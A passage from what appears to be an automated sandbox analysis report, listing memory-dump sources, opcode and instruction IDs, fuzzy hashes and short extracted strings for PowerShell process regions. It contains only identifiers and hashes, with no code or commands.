                                                                                • Instruction ID: 99113c4591e753b3d3fa5e6945fc09453076522bc17f04461e20d79033273452
                                                                                • Opcode Fuzzy Hash: 3856c57027c55dce2608894f38cf3b72d3b494562a448f83f3018589f026dded
                                                                                • Instruction Fuzzy Hash: E102432190EB855FE357AB2888153B57FE1EF82660F4801FAC08CCB19BDE189C4AC356
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29ea284cd8dbc98401ff9292de8ab2ed5ab809264b271e2d7565830a5142580a
                                                                                • Instruction ID: 9177d12bd78de5b6642c5f156a174f86016f8b82b56226f2392c0a5ac8f85151
                                                                                • Opcode Fuzzy Hash: 29ea284cd8dbc98401ff9292de8ab2ed5ab809264b271e2d7565830a5142580a
                                                                                • Instruction Fuzzy Hash: 1AF1B33090CA8D8FEBA9EF28C8557E93BD1FF58350F04426AE84DC7295DB3499858B81
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4a1e24a040aa9dda90e1991e2b75eb546207e4039ba55c98765ce5529a0fb196
                                                                                • Instruction ID: 300bd3df0e2f9cca649cf64cb89dd357cc506c2ec1e9d3885816048554898449
                                                                                • Opcode Fuzzy Hash: 4a1e24a040aa9dda90e1991e2b75eb546207e4039ba55c98765ce5529a0fb196
                                                                                • Instruction Fuzzy Hash: E7E1B23090CA8D8FEBA8EF28C8557E977E1EF54750F04826ED84DC7295DF74A8858B81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: H$ H$ H
                                                                                • API String ID: 0-3134498512
                                                                                • Opcode ID: 284bd85e560a178c32264bce6ed19d63fcad086b54623f848ff5e6f23edbe4d0
                                                                                • Instruction ID: 448b9f326a0fa3b997df2f428effe70362854ac4bb3d549c4a7910feafe616c9
                                                                                • Opcode Fuzzy Hash: 284bd85e560a178c32264bce6ed19d63fcad086b54623f848ff5e6f23edbe4d0
                                                                                • Instruction Fuzzy Hash: 49F16932E0EB8A4FE795E62898157B57BE1EF95350F5801BEC04DC71A3DF19AC0A8345
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: XH$`H
                                                                                • API String ID: 0-3239030235
                                                                                • Opcode ID: 24ca26398515bbc8a177a6ec0b28a788f8d3445aa4523da46628e1d294a01d32
                                                                                • Instruction ID: f566c2df919b1bdc3953ef135b444f36f8602d7a1d850b3e0696cd57f91a045c
                                                                                • Opcode Fuzzy Hash: 24ca26398515bbc8a177a6ec0b28a788f8d3445aa4523da46628e1d294a01d32
                                                                                • Instruction Fuzzy Hash: 0D228030A1CA4D9FDF88EF58C495AA977F2FF98750F100169E40AD3295CB35E881CB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: hOH
                                                                                • API String ID: 0-3870560792
                                                                                • Opcode ID: f58ff6fd27a84ac1363f488edaa968996cb125e0ff508a9a9db2ae127bd39580
                                                                                • Instruction ID: b0ca33a95b8611e3008c099cf77e85717c26a69f88c293cc7aab35bb16c64373
                                                                                • Opcode Fuzzy Hash: f58ff6fd27a84ac1363f488edaa968996cb125e0ff508a9a9db2ae127bd39580
                                                                                • Instruction Fuzzy Hash: 9FC15422E0EBC95FE793EA285855675BBE1EF52250F4800FBC048CB1DBDE189C49C355
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: XH
                                                                                • API String ID: 0-897431644
                                                                                • Opcode ID: 3feda0bf42bcef1eee15dd0bd37ea6753160c16bab384aa99d3f7dd487b41596
                                                                                • Instruction ID: 910a6bcdf6df59b671d659654498154ab881533f841e6775c0de0ae7b630da1f
                                                                                • Opcode Fuzzy Hash: 3feda0bf42bcef1eee15dd0bd37ea6753160c16bab384aa99d3f7dd487b41596
                                                                                • Instruction Fuzzy Hash: C2916A31E1EA894FE799E62C58557B97BE1EF86360F4801BED04EC3193EE24AC068345
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: H
                                                                                • API String ID: 0-3524016112
                                                                                • Opcode ID: f052d836d961daa10a2ab5a376a42b3838484f6cefbd8b567cc903917d575061
                                                                                • Instruction ID: b347b74941e26470ff95d5f28f36b5410e6d089d1151c8ccea8095b26788dd59
                                                                                • Opcode Fuzzy Hash: f052d836d961daa10a2ab5a376a42b3838484f6cefbd8b567cc903917d575061
                                                                                • Instruction Fuzzy Hash: 50917A32E1EA8E4FE7A5EA2888517757BE1EF55390F5401BAC00CC31E7DF29AC0A8345
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6e872990a7c88c7cae73448a3414af49bb2e3e12515c33f748a94bdc377dcfe
                                                                                • Instruction ID: 10cf1ddd43b144a88251510ebcb1126ff4f32108798350e336fcb5bfdcdea91a
                                                                                • Opcode Fuzzy Hash: d6e872990a7c88c7cae73448a3414af49bb2e3e12515c33f748a94bdc377dcfe
                                                                                • Instruction Fuzzy Hash: 6622F222E0EB894FE796E72858552797BE1EF56260F1801FAC04DCB1D3DF28AC49C356
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: efd9554fd84da2e785ffff259a008158131c0334684d0aca6e6c644fd8cee883
                                                                                • Instruction ID: 3b86793b55e9d9e55b07e8e591ab4feb6138ac69af4fa76c07595f3d2558a591
                                                                                • Opcode Fuzzy Hash: efd9554fd84da2e785ffff259a008158131c0334684d0aca6e6c644fd8cee883
                                                                                • Instruction Fuzzy Hash: FCE15532E0EA855FE356AB2858553787BE1EF45660F4801BEC04DC71CBDF28AC4AC356
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 427453cb14e14d616e9d367ad1ef22f81b4ebf0a88c3cb7f476725f0bcfcdef4
                                                                                • Instruction ID: f180d57b464cd6994b2dd229cd2d7cc8b98f4b9d92f01982f1bcea504fdb4155
                                                                                • Opcode Fuzzy Hash: 427453cb14e14d616e9d367ad1ef22f81b4ebf0a88c3cb7f476725f0bcfcdef4
                                                                                • Instruction Fuzzy Hash: 39C11821E1EB861FE35EA62C58566753BE1EF56360F4802BED08DC71E3DE1C9C0A8356
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 32c72b912c6c1944cd551cb412a549f303bd27f4f62af429dec70efa9175c250
                                                                                • Instruction ID: 62d0fdd3532bb5c3009527d99722140ae562f2610c530d3a6e45667f46b1bf55
                                                                                • Opcode Fuzzy Hash: 32c72b912c6c1944cd551cb412a549f303bd27f4f62af429dec70efa9175c250
                                                                                • Instruction Fuzzy Hash: DAB12231E1EA8A4FEB95EF2858556B57BE3EF552A0F5801FAC00CC71D3EE1898488355
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a9147f9e7482858757cbd49c7e0857c97cb888893a1ca97b855413b258342cd
                                                                                • Instruction ID: fa922a8fdd37cb836c78eb3f3e249e4fcb332768e957b37c6268940ee0e1998b
                                                                                • Opcode Fuzzy Hash: 3a9147f9e7482858757cbd49c7e0857c97cb888893a1ca97b855413b258342cd
                                                                                • Instruction Fuzzy Hash: 38B1C53050CA8D4FEBA9EF2898557E93BE1EF55350F04426EE84DC7296CB3498858B86
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e16e15cc478d5046486dd741d5f2b568ee0eacd5dbfc7a158fd04d25ade6cc7d
                                                                                • Instruction ID: 00a355d42ca8c458aa1c3ea330ed7127bc094fc426c0ea29d1068318bfce4682
                                                                                • Opcode Fuzzy Hash: e16e15cc478d5046486dd741d5f2b568ee0eacd5dbfc7a158fd04d25ade6cc7d
                                                                                • Instruction Fuzzy Hash: 5661E332A0EBC55FE757AB2858552B97FE0EF56360B4900FBC049CB0A7DB189C49C396
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 421c220acda2f3a3d4d4781457d6d103369e08e2af11a70d9da52780bf1067bd
                                                                                • Instruction ID: f46d03c38d0ad6ab4c972b0c24851215c4cfbec6784572243e030ab945df4f61
                                                                                • Opcode Fuzzy Hash: 421c220acda2f3a3d4d4781457d6d103369e08e2af11a70d9da52780bf1067bd
                                                                                • Instruction Fuzzy Hash: BF31F962D1FA874FF395AB2828552786AD3EF556A0F9801BAD41CC31D3EF0C9C48435A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05913e08f2fc81e8cbdbbcd1476d2b66581d390d550e716cb60de94248e1f74d
                                                                                • Instruction ID: c3b4601552ecfaa77449a10a6bd9f45364be5bdd7c23acd250079ad3695e0baa
                                                                                • Opcode Fuzzy Hash: 05913e08f2fc81e8cbdbbcd1476d2b66581d390d550e716cb60de94248e1f74d
                                                                                • Instruction Fuzzy Hash: E921D621E1FB4A4FF39DB62C149527566D2EF456A0F9802BAD04DC7197EF1CAC098349
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff546e04c64752c1bb4147b8a74ef5f3d3f1ac2b1edf8b117a48edd52627fe35
                                                                                • Instruction ID: a1036e47b09d389e7f573d2bd7130894030d11cdefd4d05d8d22ecd41ff82b1f
                                                                                • Opcode Fuzzy Hash: ff546e04c64752c1bb4147b8a74ef5f3d3f1ac2b1edf8b117a48edd52627fe35
                                                                                • Instruction Fuzzy Hash: 9031E37081964E8EFBF8EE54EC0ABF932A0FB45B96F400539D81D86093DB786985CB15
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2307234134.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f747a9e540e27e131b8ba9d5679cab0e49ed7bc5d932a0867d4306b3e43bb9a4
                                                                                • Instruction ID: 5980911e8f5ffb8c7d274b0259500f7f444f84561ca5d990c754dd325f19a552
                                                                                • Opcode Fuzzy Hash: f747a9e540e27e131b8ba9d5679cab0e49ed7bc5d932a0867d4306b3e43bb9a4
                                                                                • Instruction Fuzzy Hash: 0B210452E0F6C55FE799A63C28592B9AED1EF59A90F0804FEC089CB0D3DD0848898316
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                                • Instruction ID: a2cffd6589228435148380d94143afa431462d747f27e2ede83b4e2ac15b423b
                                                                                • Opcode Fuzzy Hash: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                                • Instruction Fuzzy Hash: C001677111CB0C4FD788EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E881CB45
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2306743807.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad843ef977e20ae9750932b16f6d58d597c0a12830896bb1fbfb3610a7d33f45
                                                                                • Instruction ID: 564ad264e99e277d9bceebf1d42b6117856b2a91e96e2fde6a02ffe21e9dd45a
                                                                                • Opcode Fuzzy Hash: ad843ef977e20ae9750932b16f6d58d597c0a12830896bb1fbfb3610a7d33f45
                                                                                • Instruction Fuzzy Hash: D7E14253F0DADA5FE396B63C6C690F93FA0DE539A6F0902F3D0D4870A3AA0A14478655
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \V#m
                                                                                • API String ID: 0-1157912448
                                                                                • Opcode ID: e47a5ec1bf982ade1167146ef1206e25d2c24d5f5391e7d84707b5dc38a8664c
                                                                                • Instruction ID: 0adb4e3fc04e061d4fd98411f0ef271f290c38317d2bfa6e130d253bf85aa6b9
                                                                                • Opcode Fuzzy Hash: e47a5ec1bf982ade1167146ef1206e25d2c24d5f5391e7d84707b5dc38a8664c
                                                                                • Instruction Fuzzy Hash: 2DB14C70E00219DFDF14CFA9C8857ADBBF6AF88305F248539D815E7264EB35A945CB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19a798f4f84a662d8ca2119bfbb2400e2d87db91fa5e2f057f66f86dfaa08990
                                                                                • Instruction ID: 96aa5c608fe3d479a37923d2fb7099f1f2340b4dedb7b030d55a85deeee86b91
                                                                                • Opcode Fuzzy Hash: 19a798f4f84a662d8ca2119bfbb2400e2d87db91fa5e2f057f66f86dfaa08990
                                                                                • Instruction Fuzzy Hash: 63B17270E00209DFDF14CFA9D88579DBBF6AF88364F248539D815EB268EB74A845CB41
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$4'{q$4'{q$4'{q$4'{q$4'{q$x._k$-_k
                                                                                • API String ID: 0-2952240859
                                                                                • Opcode ID: b007ef7a0afe4df803e36472787c0bf318fd636c938882eb49d823e5c2cdef40
                                                                                • Instruction ID: 291a889bfa9843dc95da2f7a825e18dffe1b4796cd033aeb4674bccc2710914f
                                                                                • Opcode Fuzzy Hash: b007ef7a0afe4df803e36472787c0bf318fd636c938882eb49d823e5c2cdef40
                                                                                • Instruction Fuzzy Hash: A0D192B0B122059FDB18DF68D455BAEBBB2AF88344F248825D9017F355CB75DC828FA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$4'{q$4'{q$4'{q$4'{q$4'{q$x._k$-_k
                                                                                • API String ID: 0-2952240859
                                                                                • Opcode ID: 391fcd97a5b0f5153e73077f53c343beab2f32377bc94ce2d443a2d9104dcece
                                                                                • Instruction ID: 196cb6e8f7e7c6ac9ed94530c4e16778f75300447763d948ad865b30b31406c4
                                                                                • Opcode Fuzzy Hash: 391fcd97a5b0f5153e73077f53c343beab2f32377bc94ce2d443a2d9104dcece
                                                                                • Instruction Fuzzy Hash: 33D184B0A052159FDB14DF68C851F9EBBB2BF84300F1085A5DA09AF395CB75DD828FA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8N#m$h]#m$h]#m$h]#m$${q$${q$I#m
                                                                                • API String ID: 0-1443363017
                                                                                • Opcode ID: 6b283775e60f1621e34ceffaa84300fb60b8316a246f8fa4fa20645a21e38153
                                                                                • Instruction ID: 0993b344e8ceeada5f1ad3d1d892b604498f2ac2d55a66547cabea6d659a3ff8
                                                                                • Opcode Fuzzy Hash: 6b283775e60f1621e34ceffaa84300fb60b8316a246f8fa4fa20645a21e38153
                                                                                • Instruction Fuzzy Hash: C9225F30B001188FDB25EB64C854BAEB7B6BF89304F1545A9D909AB361DF35ED86CF81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$4'{q$4'{q$x._k$x._k$-_k
                                                                                • API String ID: 0-2593337555
                                                                                • Opcode ID: 2d5d2f6cb836aea74593958ac3c401c3b754accbf01ba05279b88b855c162d65
                                                                                • Instruction ID: 79213e5bbd39f51dd29e5afe9da349abaed272bc7bedf651c7f356000998387f
                                                                                • Opcode Fuzzy Hash: 2d5d2f6cb836aea74593958ac3c401c3b754accbf01ba05279b88b855c162d65
                                                                                • Instruction Fuzzy Hash: DAF1A2B0A011159FDB14DF68C850FAEBBB3AF84344F1085A5EA09AF791CB75DD828F91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$(fnl$(fnl$x._k
                                                                                • API String ID: 0-3445510220
                                                                                • Opcode ID: 0e95b312dc7631d041d309eb5efa608d851f10d5676b97828f3fd7203bd96b53
                                                                                • Instruction ID: 827407e734614329ece6a76ae8c9dc760ef84f035ff1d47c6bdd17c289e245ef
                                                                                • Opcode Fuzzy Hash: 0e95b312dc7631d041d309eb5efa608d851f10d5676b97828f3fd7203bd96b53
                                                                                • Instruction Fuzzy Hash: 72B1AFF0A01215DFEB14CB68D940BAEBBF3AF88354F208469D9056B791CB76EC41CB61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$4'{q$4'{q$x._k$-_k
                                                                                • API String ID: 0-2322594212
                                                                                • Opcode ID: 39b8f05f849c9771a47f007704358ed4a0e469fe236e8db035233e07f2019f86
                                                                                • Instruction ID: 36e47e28329145ef673adc03b40738a1f60b17b6068e5fe4aebfce74f73fc801
                                                                                • Opcode Fuzzy Hash: 39b8f05f849c9771a47f007704358ed4a0e469fe236e8db035233e07f2019f86
                                                                                • Instruction Fuzzy Hash: E6B1AFB0A16205DFDB18CF64D841BAEBBB2AF88344F24C965D9016F355CB75E8428BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (fnl$(fnl$x._k
                                                                                • API String ID: 0-2562973921
                                                                                • Opcode ID: 9ff71f1340b0eea1e071e80c45444fcd73b60bbbcd9acd9fd381e578d8b3cfa9
                                                                                • Instruction ID: 1ee5879927a673a0ab02570b6c50434f72f73fa0903a70b71f142468ee73a376
                                                                                • Opcode Fuzzy Hash: 9ff71f1340b0eea1e071e80c45444fcd73b60bbbcd9acd9fd381e578d8b3cfa9
                                                                                • Instruction Fuzzy Hash: ECA1B2F0A05215DFEB15CF68D840BA9BBF2AF88354F10846AD5056B7A1CB76EC41CF61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ${q$${q$${q
                                                                                • API String ID: 0-2088758393
                                                                                • Opcode ID: 92a0a8d17f29ec62b3ea1cd5d5f22aae34f35602288792aad54cf7a6ed157da7
                                                                                • Instruction ID: f5c8f68fde17578ad3a6954c1219da934c6d860dce6f6689a556501ad0735994
                                                                                • Opcode Fuzzy Hash: 92a0a8d17f29ec62b3ea1cd5d5f22aae34f35602288792aad54cf7a6ed157da7
                                                                                • Instruction Fuzzy Hash: A14129F2B15116AFCF249A6DA8006AAF7F5AF84350B24453AC906E7301DF35D941C7A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2493541041.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7790000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'{q$4'{q
                                                                                • API String ID: 0-3585467210
                                                                                • Opcode ID: be22ab74e242369df55b363e9990d60fdd1216c68d9b6abef0614b96109912f0
                                                                                • Instruction ID: 2fd5991c5eb84481680ef6ce7ce53bf6508de0acf38d3f501e011f2eb7eeae20
                                                                                • Opcode Fuzzy Hash: be22ab74e242369df55b363e9990d60fdd1216c68d9b6abef0614b96109912f0
                                                                                • Instruction Fuzzy Hash: F1F160B4B0120ADFDB14CF98D451AAABBB2FF89344F54C469D805AF355CB72DC828B91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \V#m$\V#m
                                                                                • API String ID: 0-4212679248
                                                                                • Opcode ID: 15b8809090e7e98e26b7cbe3ea9c0afdd594afedb3c0bd36213589ff3a46da00
                                                                                • Instruction ID: b6d9a35d6099cb61213a0f16b1abe12cb20fa35d4b53f7a707f38d3d4d4e2f0a
                                                                                • Opcode Fuzzy Hash: 15b8809090e7e98e26b7cbe3ea9c0afdd594afedb3c0bd36213589ff3a46da00
                                                                                • Instruction Fuzzy Hash: 42714371E00209DFDF14DFA9C885B9EBBF6AF88314F248539D815A7264DB74A841CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \V#m$\V#m
                                                                                • API String ID: 0-4212679248
                                                                                • Opcode ID: 0be7ebb44a5854ecefff91411077740ba7d65dcb7775d1aa594cb15e4f92678c
                                                                                • Instruction ID: fe1710433242d695dba463e3c920b1df60ec96a557cd56baebe21229860a2ec6
                                                                                • Opcode Fuzzy Hash: 0be7ebb44a5854ecefff91411077740ba7d65dcb7775d1aa594cb15e4f92678c
                                                                                • Instruction Fuzzy Hash: F7715171E00209DFDF14DFA9C985B9EBBF5AF48324F248539D814A7264EB74A841CF91
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.2443868934.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_4950000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: h]#m$I#m
                                                                                • API String ID: 0-1852219892
                                                                                • Opcode ID: 66bb13b745d45d12a16d63e4dc6a78672511cd81724a443df8f7ef2ec82712da
                                                                                • Instruction ID: 1cb6958f93d6e4bb4a29b6f033d9c3dee07f829e36437391e1b5a30d28567557
                                                                                • Opcode Fuzzy Hash: 66bb13b745d45d12a16d63e4dc6a78672511cd81724a443df8f7ef2ec82712da
